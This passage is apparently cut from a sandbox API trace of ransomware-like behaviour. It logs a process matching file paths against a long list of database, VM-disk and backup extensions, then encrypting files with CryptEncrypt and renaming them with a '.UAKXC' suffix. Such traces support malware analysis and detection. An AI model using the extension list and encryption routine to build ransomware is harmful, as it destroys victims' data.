Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xdb") returned 0x0 [0158.102] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xld") returned 0x0 [0158.102] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xmlff") returned 0x0 [0158.102] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abcddb") returned 0x0 [0158.103] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abs") returned 0x0 [0158.103] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abx") returned 0x0 [0158.103] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdw") returned 0x0 [0158.103] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adn") returned 0x0 [0158.103] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db2") returned 0x0 [0158.103] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fm5") returned 0x0 [0158.103] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".hjt") returned 0x0 [0158.103] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".icg") returned 0x0 [0158.103] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".icr") returned 0x0 [0158.103] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kdb") returned 0x0 [0158.103] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lut") returned 0x0 [0158.103] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maw") returned 0x0 [0158.103] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdn") returned 0x0 [0158.103] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdt") returned 0x0 [0158.103] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vdi") returned 0x0 [0158.103] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vhd") returned 0x0 [0158.103] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmdk") returned 0x0 [0158.103] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pvm") returned 0x0 [0158.103] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmem") returned 0x0 [0158.103] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmsn") returned 0x0 [0158.104] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmsd") returned 0x0 [0158.104] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nvram") returned 0x0 [0158.104] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmx") returned 0x0 [0158.104] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".raw") returned 0x0 [0158.104] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qcow2") returned 0x0 [0158.104] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".subvol") returned 0x0 [0158.104] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".bin") returned 0x0 [0158.104] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vsv") returned 0x0 [0158.104] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".avhd") returned 0x0 [0158.104] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmrs") returned 0x0 [0158.104] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vhdx") returned 0x0 [0158.104] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".avdx") returned 0x0 [0158.104] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmcx") returned 0x0 [0158.104] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".iso") returned 0x0 [0158.104] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.104] WriteFile (in: hFile=0x6ec, lpBuffer=0x373fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x373fc78, lpOverlapped=0x0 | out: lpBuffer=0x373fd70*, lpNumberOfBytesWritten=0x373fc78*=0x20c, lpOverlapped=0x0) returned 1 [0158.107] WriteFile (in: hFile=0x6ec, lpBuffer=0x373fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x373fc7c, lpOverlapped=0x0 | out: lpBuffer=0x373fc80*, lpNumberOfBytesWritten=0x373fc7c*=0xa, lpOverlapped=0x0) returned 1 [0158.107] SetEndOfFile (hFile=0x6ec) returned 1 [0158.107] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.107] ReadFile (in: hFile=0x6ec, lpBuffer=0x4100000, nNumberOfBytesToRead=0x16fc, lpNumberOfBytesRead=0x373fc88, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fc88*=0x16fc, lpOverlapped=0x0) returned 1 [0158.108] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0xffffe904, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.108] WriteFile (in: hFile=0x6ec, lpBuffer=0x4100000*, nNumberOfBytesToWrite=0x16fc, lpNumberOfBytesWritten=0x373fc44, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesWritten=0x373fc44*=0x16fc, lpOverlapped=0x0) returned 1 [0158.108] CloseHandle (hObject=0x6ec) returned 1 [0158.111] GetProcessHeap () returned 0xea0000 [0158.111] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77920d0 [0158.111] lstrcpyW (in: lpString1=0x77920d0, lpString2="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" [0158.111] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".UAKXC" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC" [0158.111] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.uakxc")) returned 1 [0158.112] GetProcessHeap () returned 0xea0000 [0158.112] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77920d0 | out: hHeap=0xea0000) returned 1 [0158.112] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5e00 | out: hHeap=0xea0000) returned 1 [0158.112] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef32f8 | out: hHeap=0xea0000) returned 1 [0158.112] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0158.112] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0158.112] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0158.113] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml")) returned 0x2020 [0158.113] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ec [0158.113] GetLastError () returned 0x0 [0158.113] GetFileSizeEx (in: hFile=0x6ec, lpFileSize=0x373fc88 | out: lpFileSize=0x373fc88*=1383) returned 1 [0158.113] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".4dd") returned 0x0 [0158.113] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".4dl") returned 0x0 [0158.113] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".accdb") returned 0x0 [0158.114] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".accdc") returned 0x0 [0158.114] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".accde") returned 0x0 [0158.114] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".accdr") returned 0x0 [0158.114] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".accdt") returned 0x0 [0158.114] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".accft") returned 0x0 [0158.114] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".adb") returned 0x0 [0158.114] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".ade") returned 0x0 [0158.114] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".adf") returned 0x0 [0158.114] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".adp") returned 0x0 [0158.114] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".arc") returned 0x0 [0158.114] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".ora") returned 0x0 [0158.114] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".alf") returned 0x0 [0158.114] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".ask") returned 0x0 [0158.114] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".btr") returned 0x0 [0158.114] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".bdf") returned 0x0 [0158.114] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".cat") returned 0x0 [0158.114] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".cdb") returned 0x0 [0158.114] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".ckp") returned 0x0 [0158.114] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".cma") returned 0x0 [0158.115] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".cpd") returned 0x0 [0158.115] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".dacpac") returned 0x0 [0158.115] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".dad") returned 0x0 [0158.115] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".dadiagrams") returned 0x0 [0158.115] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".daschema") returned 0x0 [0158.115] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".db") returned 0x0 [0158.115] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".db-shm") returned 0x0 [0158.115] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".db-wal") returned 0x0 [0158.115] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".db3") returned 0x0 [0158.115] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".dbc") returned 0x0 [0158.115] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".dbf") returned 0x0 [0158.115] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".dbs") returned 0x0 [0158.115] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".dbt") returned 0x0 [0158.115] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".dbv") returned 0x0 [0158.115] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".dbx") returned 0x0 [0158.115] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".dcb") returned 0x0 [0158.115] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".dct") returned 0x0 [0158.115] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".dcx") returned 0x0 [0158.115] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".ddl") returned 0x0 [0158.116] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".dlis") returned 0x0 [0158.116] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".dp1") returned 0x0 [0158.116] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".dqy") returned 0x0 [0158.116] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".dsk") returned 0x0 [0158.116] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".dsn") returned 0x0 [0158.116] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".dtsx") returned 0x0 [0158.116] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".dxl") returned 0x0 [0158.116] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".eco") returned 0x0 [0158.116] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".ecx") returned 0x0 [0158.116] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".edb") returned 0x0 [0158.116] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".epim") returned 0x0 [0158.116] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".exb") returned 0x0 [0158.116] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".fcd") returned 0x0 [0158.116] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".fdb") returned 0x0 [0158.116] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".fic") returned 0x0 [0158.116] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".fmp") returned 0x0 [0158.116] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".fmp12") returned 0x0 [0158.116] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".fmpsl") returned 0x0 [0158.116] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".fol") returned 0x0 [0158.117] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".fp3") returned 0x0 [0158.117] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".fp4") returned 0x0 [0158.117] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".fp5") returned 0x0 [0158.117] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".fp7") returned 0x0 [0158.117] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".fpt") returned 0x0 [0158.117] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".frm") returned 0x0 [0158.117] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".gdb") returned 0x0 [0158.117] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".grdb") returned 0x0 [0158.117] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".gwi") returned 0x0 [0158.117] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".hdb") returned 0x0 [0158.117] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".his") returned 0x0 [0158.117] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".ib") returned 0x0 [0158.117] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".idb") returned 0x0 [0158.117] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".ihx") returned 0x0 [0158.117] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".itdb") returned 0x0 [0158.117] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".itw") returned 0x0 [0158.117] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".jet") returned 0x0 [0158.117] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".jtx") returned 0x0 [0158.118] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".kdb") returned 0x0 [0158.118] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".kexi") returned 0x0 [0158.118] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".kexic") returned 0x0 [0158.118] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".kexis") returned 0x0 [0158.118] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".lgc") returned 0x0 [0158.118] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".lwx") returned 0x0 [0158.118] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".maf") returned 0x0 [0158.118] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".maq") returned 0x0 [0158.118] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".mar") returned 0x0 [0158.118] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".mas") returned 0x0 [0158.118] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".mav") returned 0x0 [0158.118] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".mdb") returned 0x0 [0158.118] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".mdf") returned 0x0 [0158.118] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".mpd") returned 0x0 [0158.118] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".mrg") returned 0x0 [0158.119] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".mud") returned 0x0 [0158.119] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".mwb") returned 0x0 [0158.119] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".myd") returned 0x0 [0158.119] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".ndf") returned 0x0 [0158.119] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".nnt") returned 0x0 [0158.119] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".nrmlib") returned 0x0 [0158.119] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".ns2") returned 0x0 [0158.119] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".ns3") returned 0x0 [0158.119] StrStrIW (lpFirst="C:\\MSOCache\\All 